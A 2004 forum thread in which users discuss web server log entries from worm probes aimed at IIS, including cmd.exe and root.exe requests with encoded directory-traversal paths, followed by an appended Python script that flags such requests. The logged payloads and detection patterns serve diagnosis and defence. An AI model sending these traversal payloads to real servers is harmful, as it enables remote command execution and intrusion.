mg66 -
Joined: 15 Aug 2004 Posts: 85 Location: USA, Illinois
TRUSTAbyss -
Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA
Posted: Sat Aug 21, 2004 12:19 pm
It's a worm trying to hack into an IIS server lol, oh god that's funny.
Dude, you have nothing to worry about, it's a normal log file, see
the 404 part, that means it's not found, have a nice day!
In the current beta you can choose what paths you can log, so you
can refuse to log requests from /_vti_bin/, don't worry about it.
senshi -
Joined: 05 Nov 2003 Posts: 385 Location: UK
Posted: Sat Aug 21, 2004 9:05 pm
LMAO
Just hope the poor bloke didn't lose his bottle.
Drag0n -
Joined: 17 Feb 2004 Posts: 4
Posted: Tue Aug 24, 2004 5:34 am
Hmm, I got something similar to those...
Are these also for IIS?
68.189.78.164 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
211.34.181.4 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" ""
TRUSTAbyss -
Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA
Posted: Tue Aug 24, 2004 6:25 am
Umm, yeah! All of these are IIS attacks, in fact everything you see weird
in a log file is most likely an IIS attack, shows how much IIS sucks lol.
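
An added example (not part of the thread, and not code from any poster): a Python triage pass over access-log lines like the ones posted above, tagging each request by probe trait and reporting per client whether any probe was answered with a 2xx status. The tag names, the rule list and the last sample line are assumptions of this example; `/scripts/` can be a legitimate directory on non-IIS sites, so that rule needs tuning per server.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample: four requests copied from the thread plus one benign
# line from a documentation address (192.0.2.10) that is not in the thread.
SAMPLE = """\
68.189.78.164 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
211.34.181.4 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" ""
192.0.2.10 - - [23/Aug/2004:11:00:00 -0700] "GET /index.html HTTP/1.0" 200 512 "" ""
"""

# The protocol token is optional: one request in the thread lacks it.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) ([^\s"]+)(?: [^\s"]+)?" (\d{3}) ')

RULES = [  # (tag, pattern); tag names are this example's own
    ("command-shell", re.compile(r"/(?:cmd|root)\.exe(?:\?|$)", re.I)),
    # 0xC0 and 0xC1 never start a valid UTF-8 sequence (overlong forms only).
    ("overlong-utf8", re.compile(r"%c[01]%[0-9a-f]{2}", re.I)),
    ("iis-path", re.compile(r"^/(?:scripts|msadc|_vti_bin|_mem_bin)/", re.I)),
]
ENCODED_SEP = re.compile(r"%(?:5c|2f)", re.I)

def classify(path):
    """Return the set of probe tags matching one request path."""
    tags = {tag for tag, rx in RULES if rx.search(path)}
    # Double encoding: a path separator is still percent-encoded after one decode.
    if ENCODED_SEP.search(unquote(path)):
        tags.add("double-encoded")
    return tags

def summarize(log_text):
    """Group probe hits by client; 'served' is True if any probe got a 2xx."""
    out = defaultdict(lambda: {"probes": 0, "tags": set(), "served": False})
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        ip, _method, path, status = m.groups()
        tags = classify(path)
        if tags:
            entry = out[ip]
            entry["probes"] += 1
            entry["tags"] |= tags
            entry["served"] |= status.startswith("2")
    return dict(out)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE).items():
        print(ip, info["probes"], sorted(info["tags"]), "SERVED" if info["served"] else "rejected")
```

A client whose entry shows `served` as true received a 2xx for a probe path and is the case worth investigating; clients with only 4xx responses match the 404 and 400 results discussed in the thread.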